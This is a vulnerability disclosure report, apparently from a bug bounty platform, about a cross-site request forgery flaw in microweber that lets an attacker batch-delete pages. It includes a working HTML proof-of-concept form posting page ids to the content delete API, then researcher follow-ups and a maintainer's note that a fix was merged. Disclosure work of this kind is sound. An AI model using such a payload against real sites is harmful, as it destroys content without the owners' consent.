Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 30th 2021


✍️ Description

Attacker able to batch delete any Website pages if knows the pages id parameter value.

🕵️‍♂️ Proof of Concept

Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the files with id from 9 to 15 have been deleted.

//PoC.html


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
      <input type="hidden" name="ids&#91;&#93;" value="on" />
      <input type="hidden" name="ids&#91;&#93;" value="9" />
      <input type="hidden" name="ids&#91;&#93;" value="10" />
      <input type="hidden" name="ids&#91;&#93;" value="11" />
      <input type="hidden" name="ids&#91;&#93;" value="12" />
      <input type="hidden" name="ids&#91;&#93;" value="13" />
      <input type="hidden" name="ids&#91;&#93;" value="14" />
      <input type="hidden" name="ids&#91;&#93;" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

Here a page attacker can delete any file. 📍 Location app.js#L1

Occurences

We have contacted a member of the microweber team and are waiting to hear back 4 months ago
amammad
4 months ago

Researcher


Hey microweber team , can you give some feedbacks to me? thanks so much.

amammad modified their report
4 months ago
amammad
4 months ago

Researcher


Hey microweber team, I just want to sure that you see this important report too.

amammad
3 months ago

Researcher


Dear microweber team, Can I ask you to validate this report too, I think that you forget to check this report.

Best regards, Amammad.

Peter Ivanov confirmed that a fix has been merged on 76c277 3 months ago
Peter Ivanov has been awarded the fix bounty
Peter Ivanov
3 months ago

Maintainer


Issue is fixed